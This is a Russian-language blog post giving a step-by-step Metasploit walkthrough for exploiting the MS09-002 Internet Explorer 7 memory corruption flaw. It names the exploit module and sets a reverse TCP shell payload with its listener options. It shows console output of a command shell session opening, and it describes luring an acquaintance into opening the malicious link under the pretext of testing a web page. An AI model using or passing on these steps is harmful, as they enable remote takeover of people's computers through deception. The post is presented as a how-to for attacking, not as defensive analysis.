Обзор использования уязвимости Internet Explorer (или ломаем IE)
Сегодня я расскажу об использовании уязвимости в Internet Explorer. Уязвимость эта более чем актуальная,т.к. бюллетень был опубликован лишь в середине февраля 2009.
Как видно из названия статьи, для работы нам потребуется Metasploit Framework 3.3 с последними обновлениями.Итак, открываем консоль метасплойта и командуем show
в списке Exploits находим то,что нам нужно и пишем:
use exploit/windows/browser/ms09_002_memory_corruption
Мы выбрали эксплойт,теперь надо прикрутить начинку.Я для примера использовал windows/shell_reverse_tcp, вы можете выбрать любую другую из того же списка,который нам выдаёт метасплойт по команде show
Так же можно скомандовать info, чтобы посмотреть какие настройки сплойта нам надо задать
Переходим к настройкам
set LHOST 0.0.0.0 - ваш ip
set LPORT 1234 - порт для сплойта, можете писать любой
set SRVPORT 80 - порт для браузера,в принципе параметр можно не задавать,тогда порт в ссылке будет 8080
set URIPATH .....html - название страницы в сылке,необязательный параметр
Вот и всё.Командуем exploit!!!
Server started - это значит что пора просить BLC ,чтобы он затестил как отображается моя страничка, url котоорой прописан в поле Local IP:, в браузере IE Даём ему ссылку и далее, когда в консоли появятся следующие строки..
Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to
0.0.0.0:64239...[*] Command shell session 3 opened
(0.0.0.0:1234 -> 0.0.0.0:64240
...открываем активную сессию
sessions -i 3
(...а тем временем BLC пытается закрыть повисший IE, но у него это не получается, закрывает только через диспечер задач, но сессия всёравно остаётся активной)
Далее мы имеет в своём распоряжении открытую cmd.
Осталось объяснить как открыть консоль метасплойта.Для этого запускаем в GUI режиме метасплойт и жмём ctrl+O, либо в меню window - console
EbriPsy co stopxaker.ru
Inscription à :
Publier les commentaires (Atom)
Aucun commentaire:
Enregistrer un commentaire